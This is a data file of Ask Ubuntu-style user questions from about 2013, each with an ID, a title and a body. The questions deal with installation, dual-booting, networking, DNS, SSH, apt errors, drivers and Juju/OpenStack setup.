311536	install ubuntu 12.04 on a formerly win xp computer	any advice for a novice ? my laptop formerly had win xp but no longer has xp . when i try to use usb to install ubuntu 12.04 , my laptop does not respond .
311537	torrent magnet links open new window but not transmission	i 've installed ubuntu and lubuntu a few times now and some of those times i 've had the following problem , which i currently have . when i click a torrent magnet link in chrome ( usually from pirate bay ) , instead of opening transmission , the only thing that happens is a new chrome window opens . upon other installations , i 've not had this problem ; transmission opened just as i 'd like . i 've tried using chrome 's extension .torrent to transmission , but i get the error unable to contact http : //localhost:9091/transmission/rpc no response
311538	dual boot remove useless options , remove boot timer , run exe . on kubuntu	alright so i successfully installed both kubuntu and w7 . when i start my laptop it offers several boot options like w7 , kubuntu , kubuntu blabla and some other stuff . i 'd like to know if it is possible to only leave w7 and kubuntu in the boot options . ( question 1 ) oh and if i do n't choose an option in like 10 seconds kubuntu will automatically start , can i remove the timer ( ? ) . is it possible ? ( question 2 ) and since i removed ubuntu ( and installe k and w7 ) , some of the laptop 's drivers were removed . i managed to install all of them on w7 , but not on k since i could n't figure out how to install wine in order to run the exe . files . help ? ( question 3 ) thanks !
311540	does not give me the option to run alongside another operating system	during installation it does not give me the option to `` run alongside windows '' instead the pop up box gives these options : erase disc encrypt the new ubuntu installation use lvm something else really am quite new at this and dont know how to manually partition or attach root files which is what the `` something else '' choice does . everyone i have talked to and the ubuntu manual says it gives you a choice to `` run alongside windows '' , does anyone know how to remedy this problem ?
311543	setting up dns and/or nameserver on vps	i currently have a vps and two domains ( .com/.net ) at an external registrar . my registrar does have dns controls . i have a forwarded email ( on my .net ) through my registrar . i have installed and used webmin to help me set up bind . right now i 'm not able to get the domains to work . here are my bind settings , pretending my domain is mydomain.net and my server ip is 123.123.123.123 , in a master zone . address record : mydomain.net . 3600 123.123.123.123 ns1.mydomain.net . 3600 123.123.123.123 ns2.mydomain.net . 3600 123.123.123.123 name server : mydomain.net . default ns1.mydomain.net . mydomain.net . default ns2.mydomain.net . name alias : www.mydomain.net . default mydomain.net . www.mydomain.com . default mydomain.com . mail.mydomain.net 3600 mx.domain.provided.by.registrar.com . mail server : mydomain.net . 3600 0 mx.domain.provided.by.registrar.com . config files : i do have an error : /etc/bind/named.conf.options:21 : unknown option 'forwarders' /etc/bind/named.conf include `` /etc/bind/named.conf.options '' ; include `` /etc/bind/named.conf.local '' ; include `` /etc/bind/named.conf.default-zones '' ; /etc/bind/named.conf.options options { directory `` /var/cache/bind '' ; auth-nxdomain no ; # conform to rfc1035 listen-on-v6 { any ; } ; } ; forwarders { 123.123.123.123 ; } ; /etc/bind/named.conf.local zone `` 0.168.192.in-addr.arpa '' { type master ; file `` /etc/bind/zones/rev.0.168.192.in-addr.arpa '' ; } ; zone `` mydomain.net '' { type master ; file `` /var/lib/bind/mydomain.net.hosts '' ; } ; /etc/bind/named.conf.default-zones zone `` . '' { type hint ; file `` /etc/bind/db.root '' ; } ; zone `` localhost '' { type master ; file `` /etc/bind/db.local '' ; } ; zone `` 127.in-addr.arpa '' { type master ; file `` /etc/bind/db.127 '' ; } ; zone `` 0.in-addr.arpa '' { type master ; file `` /etc/bind/db.0 '' ; } ; zone `` 255.in-addr.arpa '' { type master ; file `` /etc/bind/db.255 '' ; } ; on my registrar , i 've set up a glue record linking both ns1 and ns2.mydomain.net to 123.123.123.123 , and applied ns1 and ns2.mydomain.net as the nameservers of mydomain.com and mydomain.net also , my vps has a web panel which supplies me with ipv4 , ipv6 and reverse dns for them , which i did not modify or use . am i missing any information ? thanks a lot.. i spent a lot of time on this and i 'm afraid i ca n't get this to work by myself . at the same time , is it even possible to use my registrar 's dns service if i have a forwarded email with them ? or maybe i should be using my registrar 's dns service ?
311550	error when updating	every time i run apt-get update i get the error for one ppa : w : failed to fetch gzip : /var/lib/apt/lists/partial/gb.archive.ubuntu.com_ubuntu_dists_precise_universe_source_sources hash sum mismatch i have 38 packages under `` not being installed '' but they are mostly to do with graphics and would like to install them . is there a way to sort this ?
311558	ssh permission denied ( publickey )	i have tried searching previous questions for answers to my question but all of the answers that have been suggested previously have n't worked for me . i am trying to connect to a linode ( running ubuntu 12.04 lts ) from my local machine ( also running ubnutu 12.04 lts ) i have create a private and public key on my local machine and copied my public key to my linode 's authorized_keys file . however whenever i try to ssh to my linode i get the error message `` permission denied ( publickey ) . its not a problem with how ssh is set up on my linode because i can ssh to it from my windows machine using key authentication . in my .ssh directory on my local ubuntu machine i have my id_rsa and id_rsa.pub files . do i need to create an authorized_keys file on my local machine ? edit : this is what i get when i run ssh -vvv -i id_rsa [ youruser ] @ [ yourlinode ] debug3 : authmethod_lookup publickey debug3 : remaining preferred : keyboard-interactive , password debug3 : authmethod_is_enabled publickey debug1 : next authentication method : publickey debug1 : offering rsa public key : id_rsa debug3 : send_pubkey_test debug2 : we sent a publickey packet , wait for reply debug1 : authentications that can continue : publickey debug2 : we did not send a packet , disable method debug1 : no more authentication methods to try . permission denied ( publickey ) .
311560	what happens when i cancel a deja dup backup ?	recently i had a reason to cancel a deja dup backup an hour later after it started . now i wonder whether it messed up anything on the backup destination ( as3 storage ) ?
311568	boot from cd drive in grub2	how can i add a grub2 menu entry to boot from my cd drive ? would i have to chainload it , or is there another way of doing it ?
311569	clearing caches in ubuntu	i need to clear system cache in order to record the time taken by a postgres query in cold cache . for clearing the system cache i am executing the following commands as root on ubuntu server 12.04 : sync ; echo 1 > /proc/sys/vm/drop_caches sync ; echo 2 > /proc/sys/vm/drop_caches sync ; echo 3 > /proc/sys/vm/drop_caches i am running the following sql commands along with clearing caches : 1. select col1 from my_table ; //time taken= 3000 ms 2. sync ; echo 1 > /proc/sys/vm/drop_caches sync ; echo 2 > /proc/sys/vm/drop_caches sync ; echo 3 > /proc/sys/vm/drop_caches 3 . now again running the same select command and clearing caches : select col1 from my_table ; //time taken= 200 ms 4. sync ; echo 1 > /proc/sys/vm/drop_caches sync ; echo 2 > /proc/sys/vm/drop_caches sync ; echo 3 > /proc/sys/vm/drop_caches 5 . now again running the same select command and clearing caches : select col1 from my_table ; //time taken= 10 ms from what i can interpret from the reduced query execution time is , even after clearing the caches , in effect caches are not getting cleared . is my interpretation correct ? is there some other way of clearing caches in ubuntu 12.04 server ?
311571	errors were encountered while processing : linux-image-extra-3.5.0-34-generic linux-image-generic linux-generic	i am having an issue with installing anything ( via apt-get ) on an ubuntu 12.10 server ( terminal only ) . does anyone have any resources that could lead t a solution to the following error ? errors were encountered while processing : linux-image-extra-3.5.0-34-generic linux-image-generic linux-generic
311574	how can i install uniscan on ubuntu 13.04 ?	when i try to run uniscan.pl with perl ./uniscan.pl , i get this message : ca n't locate moose.pm in @ inc ( @ inc contains : ./uniscan /etc/perl /usr/local/lib/perl/5.14.2 /usr/local/share/perl/5.14.2 /usr/lib/perl5 /usr/share/perl5 /usr/lib/perl/5.14 /usr/share/perl/5.14 /usr/local/lib/site_perl . ) at uniscan/crawler.pm line 3 . begin failed -- compilation aborted at uniscan/crawler.pm line 3 . compilation failed in require at ./uniscan.pl line 25 . begin failed -- compilation aborted at ./uniscan.pl line 25 .
311582	resolved - unable to run live cd ubuntu 13:04 on acer aspire m5 481t 6417 . is there any video driver incompatibility ?	i made the purchase of this notebook with the thought of installing ubuntu . however , it was not successful in my attempts . i 've done searches on google and other forums that discuss ubuntu . found that staff had dificudades with the new uefi , but sufficed some settings and succeeded . my case is different , put the pendriver to install , start grub select to use without installing after that the screen is all black , but the light of pendriver is at work and after a while this situation behold hear the traditional drums stating that system is increased and at login . but the screen is still black invalidating anything . so this is my question : anyone experienced the same difivuldade and managed to install ubuntu on this laptop ? i 've changed the bios to legacy , already formatted the pendriver in mtr and gpt and always the same thing . if they can give direction i am grateful . thank you
311583	juju + openstack . bootstrap is successful , but cant create any other services	a bit of context . i 'm running openstack , deployed via maas running in vmware 5.1u1 . i used this guide for maas : http : //maas.ubuntu.com/docs/quantal/install.html and this one for openstack : https : //help.ubuntu.com/community/ubuntucloudinfrastructure ( the section for maas and juju ) after some initial headaches , maas and openstack seem to be happy ( ish ) . i 've now set environments.yaml to attach to the openstack setup , which also seems to work . since juju bootstrap completes successfully and i see the instance spin up in openstack . juju status looks good too : $ juju status 2013-06-22 18:11:35,330 warning openstack identity service not using secure transport 2013-06-22 18:11:35,331 warning s3 api calls not using secure transport 2013-06-22 18:11:35,331 info connecting to environment ... 2013-06-22 18:11:35,401 warning openstack compute service not using secure transport 2013-06-22 18:11:36,041 info connected to environment . machines : 0 : agent-state : running dns-name : 192.168.1.2 instance-id : 460b0613-92a0-4dfd-8ad8-1b187d77a9fa instance-state : running services : { } 2013-06-22 18:11:36,115 info 'status ' command finished successfully if i try to deploy any service , for example juju deploy juju-gui $ juju deploy juju-gui 2013-06-22 18:15:32,060 info searching for charm cs : precise/juju-gui in charm store 2013-06-22 18:15:33,320 warning openstack identity service not using secure transport 2013-06-22 18:15:33,320 warning s3 api calls not using secure transport 2013-06-22 18:15:33,402 warning openstack compute service not using secure transport 2013-06-22 18:15:33,428 info connecting to environment ... 2013-06-22 18:15:34,063 info connected to environment . 2013-06-22 18:15:34,064 warning openstack identity service not using secure transport 2013-06-22 18:15:34,064 warning s3 api calls not using secure transport 2013-06-22 18:15:34,071 info using cached charm version of juju-gui 2013-06-22 18:15:34,094 warning openstack identity service not using secure transport 2013-06-22 18:15:34,094 warning s3 api calls not using secure transport 2013-06-22 18:15:34,160 warning openstack compute service not using secure transport 2013-06-22 18:15:34,183 warning openstack identity service not using secure transport 2013-06-22 18:15:34,184 warning s3 api calls not using secure transport 2013-06-22 18:15:34,249 warning openstack compute service not using secure transport 2013-06-22 18:15:34,284 warning openstack identity service not using secure transport 2013-06-22 18:15:34,285 warning s3 api calls not using secure transport 2013-06-22 18:15:34,349 warning openstack compute service not using secure transport 2013-06-22 18:15:34,373 warning openstack identity service not using secure transport 2013-06-22 18:15:34,373 warning s3 api calls not using secure transport 2013-06-22 18:15:34,437 warning openstack compute service not using secure transport 2013-06-22 18:15:34,467 warning openstack identity service not using secure transport 2013-06-22 18:15:34,467 warning s3 api calls not using secure transport 2013-06-22 18:15:34,530 warning openstack compute service not using secure transport 2013-06-22 18:15:34,553 warning openstack identity service not using secure transport 2013-06-22 18:15:34,554 warning s3 api calls not using secure transport 2013-06-22 18:15:34,620 warning openstack compute service not using secure transport 2013-06-22 18:15:34,645 info charm deployed as service : 'juju-gui' 2013-06-22 18:15:34,646 info 'deploy ' command finished successfully the command complete successfully , but nothing spins up in openstack . i get some warnings about secure connections , yes , but i 'd like to think that inst causing my problems $ juju status 2013-06-22 18:20:35,763 warning openstack identity service not using secure transport 2013-06-22 18:20:35,763 warning s3 api calls not using secure transport 2013-06-22 18:20:35,764 info connecting to environment ... 2013-06-22 18:20:35,833 warning openstack compute service not using secure transport 2013-06-22 18:20:36,464 info connected to environment . machines : 0 : agent-state : running dns-name : 192.168.1.2 instance-id : 460b0613-92a0-4dfd-8ad8-1b187d77a9fa instance-state : running 3 : instance-id : pending services : juju-gui : charm : cs : precise/juju-gui-61 relations : { } units : juju-gui/1 : agent-state : pending machine : 3 public-address : null 2013-06-22 18:20:36,553 info 'status ' command finished successfully i 've only been experimenting with juju for a week now , so i 'm sot sure how to begin troubleshooting this . i 'm sure it 's something simple , there are just a thousand simple things to check . any help would be appreciated . environments.yaml default : openstack_s3 environments : maas : type : maas maas-server : 'http : //192.168.1.100:80/maas' maas-oauth : 'wxcwajzwf3jubk8m9d : pyd5g4ut5ve2qmdhn9 : pv2fnepuuppu96tstyb59jqjegqmrudm' admin-secret : '|omitted|' default-series : precise openstack_s3 : type : openstack_s3 control-bucket : juju-openstack-admin-a1dd-ddf7023d869c admin-secret : bec797e973914c05b954db4ef0074235 default-series : precise default-image-id : 25eaf6ca-8568-403f-b395-29b64dcf8566 auth-url : http : //192.168.1.112:5000/v2.0/ username : admin password : openstack project-name : admin secret-key : 033f36a1e2524afea1142e6b2055c76b ec2-uri : http : //192.168.1.108:8773/services/cloud s3-uri : http : //192.168.1.108:3333 $ juju -- version juju 0.7 also , per maas and juju post-bootstrap connection error i 've changed the hostnames in my environments.yaml to ips . no change .
311586	kindle installation	has anyone installed ubuntu on a kindle tablet . if so what is the process to installing the os on the device . do you load it to dvd , or download it on the table . joseph
311587	file sharing ubuntu 13.04 & windows 7	complete noob question . hey i have just recently installed ubuntu 13.04 on my hp pavillion dm1 laptop which is wireless . i have 2 windows 7 machines connected via ethernet and i am trying to set-up file sharing between them , but no matter what i do i ca n't get it working . windows just refuses to see it anywhere on either machine and i can get to a point where the windows machines is available on the ubuntu machine , but either 1 or 2 things happen when i select it . it opens & nothing is in it , or it comes up with the workgroup folder and when i open it , it has the ubuntu folders in it . i have full file sharing enabled on my windows machines , i am seriously at a complete loss . i have seen that its harder to accomplish on the newer versions of ubuntu but i 'm not sure how accurate this is .
311597	ubuntu on dvd , ready to install still boots to windows	i have burned ubuntu onto a start up dvd as instructed . it is in the dvd drive prior to starting up the computer . when i turn computer on it goes to windows vista . nothing has changed . how do i install this operating system ?
311598	mdm does n't automatically start	i just successfully installed mdm on 13.04 with this guide , replacing but not uninstalling lightdm : how can i replace lightdm with `` mdm '' ? . however , when i first rebooted , i just got a blank screen . i booted into recovery , and switched back to lightdm and booted back . i did sudo mdm and immediately it went to the default mdm login screen . but upon reboot , it again gave a blank screen . so back in recovery , i ran mdm as root , and same thing , except upon logging in there was no network connection nor sound ( which i understand because it was still in recovery ) . i 'm not sure why mdm is n't automatically starting with boot , but lightdm still works . is there any way to get mdm to start the way it should ?
311603	opening a quickly dialog using a button	i have created a window using quickly add dialog . but i ca n't figure out how to simply open the dialog from a button . i have already set up a button in my main window and set up the code for it . this is the code for the button : def on_quicksitesbutton_clicked ( self , widget ) : dialog = quicksitesdialog.quicksitesdialog ( ) result = dialog.run ( ) i also imported the dialog with this line of code : from brandsonicweb.quicksitesdialog import quicksitesdialog the program runs fine , but when i click the button i get in the terminal : traceback ( most recent call last ) : file `` /home/brandon/brandsonicweb/brandsonicweb/brandsonicwebwindow.py '' , line 71 , in on_quicksitesbutton_clicked dialog = quicksitesdialog.quicksitesdialog ( ) attributeerror : type object 'quicksitesdialog ' has no attribute 'quicksitesdialog' what am i doing wrong ? how can i make this work ?
311604	staying in windows , how can i know my ubuntu version ?	i installed simultaneously win7 in a machine with ubuntu . now i want to enter to ubuntu but it always gets me to the windows side . i know i have to use a bootable usb but i do n't know the version of ubuntu to use the correct iso image . any ideas ? thanks ( :
311606	install ubuntu server 13.04 on hard drive and data on another	i was wondering if it is possible to run a web server that has a small 80 gb hard drive for ubuntu server 13.04 and all the installations , etc . however have a separate 2 tb hard drive store the data . how would i go about setting this up for ubuntu and apache work this ? and if so , in the command line how would i access each drive . thanks , stephen
311610	ubuntu-java installation-topcoder-âjava not foundâ	i realized that this might be the dumbest question here , but being a total beginner as i am , i really could n't figure it out after trying all kinds of instructions i could found on the web . specs : ubuntu 13.04 ; what i intended to do : check out the algorithm competition section , by clicking the second-to-left tab , located on the top-left of the page : http : //community.topcoder.com/tc what i got : a pop-up saying java not found ! java could not be automatically detected on your machine . this page will attempt to automatically install java and java web start . if the download and installation does not occur automatically , click the link below to go to the sun website where you can download the latest version of java . what i did : i followed instructions on this ubuntu documentation page : https : //help.ubuntu.com/community/java and installed openjdk ( java runtime environment/browser plugin/sdk ) through ubuntu software center . then i rebooted the system , tried the page again . but i still got the java not found pop-up described above . question : what 's missing the get this working ? thank you !
311616	why ubuntu does not use the kernels installed by automatic update ?	i used the script describe in this question to list the kernel installed on the computer : how do i to remove or hide old kernel versions , to clean up the boot menu ? in the 3.2.0 , i have 33 , 34 , 35 , 36 , 37 , 38 , 39 , 41 , 43 , 44 , 45 and 48 . i would expect to be running 3.2.0-48 after a reboot , but i am still running 3.2.0-32 . why the kernels installed by auto update are not used ( and not offered in menu.lst ) ? [ i am running 12.04 lts ] grep title /boot/grub/menu.lst result in : title ubuntu 12.04.1 lts , kernel 3.2.0-32-generic title ubuntu 12.04.1 lts , kernel 3.2.0-32-generic ( recovery mode ) title ubuntu 12.04.1 lts , kernel 2.6.32-45-generic title ubuntu 12.04.1 lts , kernel 2.6.32-45-generic ( recovery mode ) title ubuntu 12.04.1 lts , kernel 2.6.32-44-generic title ubuntu 12.04.1 lts , kernel 2.6.32-44-generic ( recovery mode ) title ubuntu 12.04.1 lts , kernel 2.6.32-43-generic title ubuntu 12.04.1 lts , kernel 2.6.32-43-generic ( recovery mode ) title ubuntu 12.04.1 lts , memtest86+ i would have expected the kernel between 3.2.0-33 to 3.2.0-48 to be in this file and the default to be latest . why the kernel 3.2.0-33 to 48 are not added in this file ? when i ran sudo dpkg-reconfigure linux-image-3.2.0-48-generic , it found all the other kernels , and regenerated menu.lst , but in contains only the same 9 entries .
311617	where to find gui code	i 've been rummaging through unity 's source code ( shell interface ) and i was a little curious about something ; where in the code are you supposed to find positional code ? i 'll clarify a bit with some examples . how do you find in the code what tells the launcher to sit on the left side of the screen ? where in the code does it tell the `` session '' button on the panel ( top ) to sit at the very right of the screen ? i guess my real question is how do i find this out for myself ? i 've looked through a big portion of the source code and ca n't find anything related to the actual position of these items , only their sub-items like text-align . any guidance on this would be much appreciated .
311620	does not give me the option to `` run alongside windows ''	during installation it does not give me the option to `` run alongside windows '' instead the pop up box gives these options : 1.erase disc 2.encrypt the new ubuntu installation 3.use lvm 4.something else really am quite new at this and do n't know how to manually partition or attach root files which is what the `` something else '' choice does . everyone i have talked to and the ubuntu manual says it gives you a choice to `` run alongside windows '' , does anyone know how to remedy this problem ? i have windows 8 uefi on an inspiron 3520 i have 5 partitions , two are un-allocated 1 with 819 gb . on the c drive there are a few window files mostly windows desktop files `` program files , the majority of window files are on a different partition called `` esp '' does this help ?
311621	need to wipe my hard drive from crashed windows 7 to install ubuntu	trashed windows 7 hardrive . trying to install ubuntu 13 . need to wipe hardrive but having no success with search items on line . call me stupid but ca n't i just do it from the command prompt with some simple command ? i 'm in ubuntu 13 right now as a trial run on the trashed hp g62 i3 64 hard drive unit . any suggestions ?
311622	downgrading iwlwifi	i asked this question , but i 'm becoming more and more certain that my problem stems from a faulty iwlwifi firmware version . rather than muddy the water there , i 'd like to ask if it 's possible to downgrade my islwifi firmware to a previous version . if it 's possible , can you tell me specifically how ? i 'm not really great with generic instructions . or is there a website that i 've missed ?
311624	microphone noise problem	this is yet another microphone noise problem question . i 've checked http : //askubuntu.com/search ? q=microphone+noise and they are not for latest ubuntu 13.04 . i 've dell inspiron 7520 with arecord -- list-devices list of capture hardware devices ** card 0 : pch [ hda intel pch ] , device 0 : conexant analog [ conexant analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 i 've already changed default sample rate to 96,000 , already added tsched=0 and default-fragment-size-msec to 5 . here is sample of sound recorded with arecord in -r 8000 and -r 96000 : http : //www55.zippyshare.com/v/41026306/file.html http : //www55.zippyshare.com/v/29604786/file.html as you can hear from the above files there is constant noise in background . this is not present in windows . in alsamixer i 've microphone boost selected by two up keystroke which puts it to 28 and internal microphone to full . this is the best setting i 've found so far which puts my sound loud enough and background noise to minimum . still it would be best if i can get rid of this noise .
311630	screen becomes white after exiting full screen flash videos	this happens a lot when i spend my day watching online videos ( especially long ones ) . when i exit full scren from flash video , the whole screen becomes white and i ca n't do anything to fix it . i try to go ctrl+alt+f12 and than ctrl+alt+f7 but it stays white when i return to graphical mode . i resolve it by killing ligtdm and starting it again from tty . i have ubuntu 13.04 , latest chrome and latest updates . i have intel i3 processor with integrated gpu intel速 ironlake mobile x86/mmx/sse2 .
311631	how do i map a key to middle click ?	i have the same question as map caps-lock key to middle mouse click , but i had two problems using it . first , removing the normal use of caps lock did n't work . second , i ca n't use it to hold the middle mouse button . also , easystrokes does n't seem to exist anymore , so that answer is n't helpful .
311632	wifi with two computers with ubuntu not working	at my home network everytime i try to connect to the internet my two computers with ubuntu 12.04 at the same time to the router via wifi the connection fails . only one gets connection to the internet . it happends with any other computer with ubuntu ( the bug is hardware independent ) . if i switch to windows in any machine the porblem dissapears i need help . i need my internet in my two computers at home . new info ( 08/jan/2014 ) : ok , i have discovered 2 things 1 . the problem also is with my android smartphone . 2 . the problem seems to be the router 's firmware or settings . the same router from another isp gave no issues , even with more linux devices in the network . a partial solution is to assign fixed ip addresses to all linux devices . it works most of the time . i need confirmation please .
311635	kernal panic not syncing	there is no operating system on my hp desktop i have lubuntu 13.04 and when i enter try or install it gives me kernal panic-not syncing attempted to kill unit 0x00000007 under says drm kms helper panic occurred switching back to text console and nothing else i 've checked ram i 've tested memory not sure what else i can do
311636	dual booting in pre-installed windows 8 machine	i have bought dell xps 14 ultrabook machine preinstalled with windows 8 . now i want to dual boot windows 8 and ubuntu . i have created 50 gb unallocated disk space to install ubuntu . however at the time of installation of ubuntu it is not able recognize the disk space and not even windows 8 . therefore i am not able to install ubuntu as a second os . please help me to solve this issue . i really need ubuntu to be installed .
311639	ubuntu 13.04 network access	i just upgraded from ubuntu 9.10 to 13.04 . as soon as i logged in , the system announced i was no longer connected to the network , and i ca n't figure out how to connect . i 'm using an ethernet cable , so there 's no wireless stuff to deal with - and it had no trouble connecting the whole time it was upgrading . does anyone know how to turn the network connection back on ?
311640	how to use gdb to debug execution error ?	when i ./tata i get segmentation fault . ( core dumped ) so i figure i need to debug the error , but i could n't get where the line of errors are . therefore , i need some guidelines from experienced guys to guide me.. thank you..
311645	i missed the removal step after my upgrade from oneiric to precise	i have just upgraded my ubuntu form oneiric to precise . but unfortunately my pc hanged up , just before i was to start the removal step to remove the unnecessary packages . hence , after a restart my pc is working well but keeping the old and unnecessary packages is wasting my limited pc resources . please help me how to identify and remove them ? regards ,
311651	how to install webp plugin for gimp ?	how to install gimp webp plugin ? i found out that we can do it using with gimp-plugin-registry , but donno how . i have install gimp-plugin-registry extension for gimp from ubuntu software center , now what should i do ? i also found out that we can put plugins in /usr/lib/gimp/2.0/plug-ins/ , so i tried to compile the gimp webp plugin src . i installed libwebp-dev and ran make in plugin source folder . it says package gtk+-2.0 was not found in the pkg-config search path . so i decided to install libgtk package but i found both libgtk2.0-dev and libgtk-3-dev . is libgtk-3-dev is latest release of the libgtk2.0-dev ? if so is it ok if i installed the later one ? i want to know at least how to install the plugin with gimp-plugin-registry and i will be more happy if i can do it by compiling src . -- -- -- -- -- edit -- -- -- -- -- i 've installed libgtk-3-dev and ran make and it threw same error , i carried on with libgtk2.0-dev , now it throws package gimp-2.0 was not found in the pkg-config search path . there is no gimp-dev in repositories ! i got stuck !
311654	how to add a location to `` places '' instead of `` bookmarks '' in nautilus/ubuntu 's file manager ?	i want to add a custom bookmark to nautilus's/ubuntu 's file manager 's sidebar , right under : places as opposed to adding it right under bookmarks
311659	partitioning my hard disk keeping everything and saving 20gb for ubuntu : possible ?	i know that if i want to use ubuntu aside windows 7 , i 'll have to partition the drives , but i do n't actually know about partitioning . this is very new . i want to ask something . how should i partition my drives ? i currently have this sort of configuration : what i want to do : 1 . no changes to /dev/sda3 ( ankita ) ( that 's somebody else 's ) 2 . utilize 5 gb from /dev/sda2 and 15 gb from /dev/sda4 and that unallocated space 3 . so , i want to use 20 gb to get some ubuntu experience . how to do this ? what are the possible dangerous outcomes ? ( i 'm sick of using ubuntu from livecd ) thanks a lot . update : i now have a better situation . i 've formatted sda3 and now i want to install ubuntu inside that drive . how do i proceed ?
311663	my computer shows 6 boot options instead of 2	i installed ubuntu 12.04 alongside with my windows 7 this morning . the installation was ok but there are 6 choices appearing on my boot options when i boot up . it was like this : ubuntu ( blah blah blah ... this is the one i choose when i want to boot ubuntu ) ubuntu ( blah blah blah ... ) check memory check memory windows 7 ( which i choose to boot windows 7 ) windows 7 ( blah blah )
311667	oversized menu icons ?	is it possible to fix bluej , python and idle above normal size icons in the main menu ?
311678	how to restore window partition in ubuntu dual booting ?	my pc hard disk 500gb.my computer c , d , e , f , g , h partition .c is window 8 partition.h installed ubuntu 12.10 used dual booting . i try replaced ubuntu 13.04 install .i choose erase button few seconds i stopped installing.now window partition missed in allocated 426.20 gb.how restore window partition without lose data . other 20 gb where i do know.any body help me thanks .
311679	compiz/unity broken with ati radeon hd6670 ubuntu 13.04 after reboot	i have had my display working correctly on a new machine ( ubuntu 13.04 64-bit , ati radeon hd6670 ) for the last 3 weeks using the proprietary driver downloaded from the ati website . yesterday , i rebooted the machine and now compiz is broken . i have no unity menu , no sidebars , no window decoration . i have tried following the instructions : compiz has broken after installing 12.10 with ati catalyst 12.10 drivers to completely remove the driver , rebuild the .deb packages and reinstall . however i still have no compiz etc . fglrxinfo gives : sudo fglrxinfo display : :0.0 screen : 0 opengl vendor string : advanced micro devices , inc. opengl renderer string : amd radeon hd 6670 opengl version string : 4.2.12217 compatibility profile context 12.104 actually ps aux|grep compiz indicates that compiz is actually running , but i have no effects ( e.g . prior to the reboot i had `` wobbly windows '' effect ) , no window decoration & no unity launcher . thanks . when i start gnome-panel from a terminal , it starts but gives : ( gnome-panel:5308 ) : gtk-critical ** : gtk_accelerator_parse_with_keycode : assertion `accelerator ! = null ' failed ** ( gnome-panel:5308 ) : warning ** : unable to parse mouse modifier ' ( null ) ' windows ca n't be moved or resized
311684	installing ubuntu to a laptop without cd rom	i am new to ubuntu . how can i clean install ubuntu to a laptop without a cd rom and if i put iso file in a flashdrive how it works when booting up ?
311687	ext4 file system format dirve not shows in windows 8	to install ubuntu 13.04 formatted a drive with ext4 file system format . after format it ca n't open the drive from windows 8 os login . whenever i try to open the drive following error shows : thanks in advance
311697	how to fix ubuntu getting stuck at creating ext4 file partition on liveccd ?	i have an acer aspire one . not sure what version . i 've had it for a year or two on windows and then suddenly , i could n't boot windows anymore . so i decided to use ubuntu . i first tried ubuntu 13.04 . it said my hard disk was faulty . so , i decided to try a lower version : 12.04 . whenever i get to the part where it starts creating ext4 file system , it gets stuck . i know that it is stuck because i have waited for 1-2 hours , and it did n't move a bit . i do n't know what i am doing wrong . maybe my hard drive is ruined or something . i do n't know . any ubuntu installer i try never works to go through the whole installation . i have been using a livecd for my installation . i have tried the disk utility . it says that a few sectors are bad . only two when i checked . those sectors did n't seem very important . for the memory test , there was only one failing address . it also said my err-bits were 80000 and the count chan 1 .
311699	how to disable blinking cursor in gnome 3.8 ?	there is this proposed solution to disable the blinking cursor in gnome terminal . however , it no longer seems to work for gnome 3.8 . the option /apps/gnome-terminal/profiles/default in gconf does not exist . so , what is a working solution for gnome 3.8 ?
311702	what partition table does the ubuntu 12.04 installer make ?	what partition table does the ubuntu 12.04 live cd installer make ? or can you choose that ? or should i use gparted when i make the partitions for best compatibility ?
311703	youtube stopped working after ubuntu 13.04 upgrade ( and reinstall )	i upgraded my ubuntu 12.10 to 13.04 using software updater . after the upgrade youtube stopped working ( both firefox and chrome ) . that is , none of the videos i tried can be played . progress bar is spinning like video is loading , however after a few minutes `` the video is currently unavailable '' message appears . first , i chose html5 from youtube settings to fix the issue , but no luck . then i burned ubuntu 13.04 to a usb and tried to run the pc from usb to see if there was a problem with the upgrade . i opened firefox and youtube played videos with html5 . after that , i concluded that there was a problem with the upgrade and formatted my pc . however after a fresh install youtube is still not working . is there anyone who knows how to fix this ? edit : i created a virtual machine running windows xp using virtualbox and it too did not play youtube videos .
311704	ubuntu 12.04 with 2.6.38 kernel	can i install vanilla kernel 2.6.38 on ubuntu 12.04 ? ! ? i tried installing it and booted 2.6.38 instead of default kernel but it never boots up . all i need to know is can i install 2.6 kernel on ubuntu 12.04 ? ps : i dont want gui access , i am fine with just the console login . thanks , bala .
311705	what is the difference between apt-get and aptitude ?	both of the commands help in the installation of packages but what is the basic difference in their usage ?
311708	ant not working on ubuntu 12.10	i have installed ant on my ubuntu 12.10 . when i try to compile a java project with build.xml , i get the following error : /usr/bin/ant : 1 : eval : syntax error : unterminated quoted string ls -lrt /usr/bin/ant lrwxrwxrwx 1 root root 20 may 18 2012 /usr/bin/ant - > ../share/ant/bin/ant if i use \ant is works . dpkg -l ant desired=unknown/install/remove/purge/hold | status=not/inst/conf-files/unpacked/half-conf/half-inst/trig-await/trig-pend |/ err ? = ( none ) /reinst-required ( status , err : uppercase=bad ) ||/ name version architecture description +++-==========================-==================-==================-========================================================= ii ant 1.8.2-4build2 all java based build tool like make please help
311711	how to completely remove kwin ?	i installed kwin yesterday , using this command : sudo atp-get install kde-window-manager then i thought it didnt work , so i also did this command , then rebooted sudo apt-get install kde-workspace-bin now it did work . however i really want to remove it because i lack disk space . how do i completely remove kwin , to ubuntu basics . so that the login screen is back to the original ubuntu login screen and i have more freed disk space . i tried sudo atp-get remove kde-window-manager and sudo apt-get remove kde-workspace-bin the login screen is still different from the original ubuntu login screen , and i gained a mere ~12mb disk space instead of ~110mb used for kwin . thanks in advance
311714	how to mount a windows share using deja-dup and a nas device configured by a winxp machine ?	i have ubuntu 12.04 lts installed on my main laptop and my old machine runs win xp . the win xp machine configures a buffalo ls-xl65f network attached storage device . i 'm having a problem with deja-dup and backing up my ubuntu home folder to the nas device . when i try to configure deja-dup to connect to the nas device ( which is configured on the windows xp machine ) , i always get the error message , `` failed to mount windows share '' . i can mount the nas windows share using nautilus file browser and copy the files to the nas manually , but i would like configure deja-dup to do it regularly , on a weekly basis . i 'm not sure if was necessary or not , but i downloaded and installed samba , and tried to configure that . i 'm guessing there must be something wrong with my syntax in deja-dup . i 'm also no expert in linux . the syntax i 'm using looks like this : is there something obvious that i 'm doing wrong ? thanks in advance .
311721	lock screen periodically for some time	for the sake of caring about eyes i would like my screen to be blocked e.g . every hour for 5 minutes ( or another intervals ) . once i used one programme for doing it , but now i ca n't recall its name . does someone know programmes that can help to get such functionality ?
311722	why is there a ( -11-system error ) whenever i run sudo apt-get update ?	why is there a ( -11-system error ) whenever i run sudo apt-get update ? something wicked happened resolving 'archive.ubuntu.com : http ' ( -11 - system error )
